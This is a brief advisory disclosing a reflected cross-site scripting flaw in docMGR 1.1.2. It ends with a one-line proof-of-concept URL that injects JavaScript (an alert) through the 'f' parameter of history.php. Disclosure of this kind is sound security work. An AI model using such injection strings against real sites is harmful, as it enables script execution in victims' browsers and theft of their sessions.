------------------------------------------------------------------------ Software................docMGR 1.1.2 Vulnerability...........Reflected Cross-site Scripting Threat Level............Low (1/5) Download................http://www.docmgr.org/ Discovery Date..........5/12/2011 Tested On...............Windows Vista + XAMPP ------------------------------------------------------------------------ Author..................AutoSec Tools Site....................http://www.autosectools.com/ Email...................John Leitch ------------------------------------------------------------------------ --Description-- A reflected cross-site scripting vulnerability in docMGR 1.1.2 can be exploited to execute arbitrary JavaScript. --PoC-- http://localhost/docmgr/history.php?f=0%22%29;}alert%280%29;{//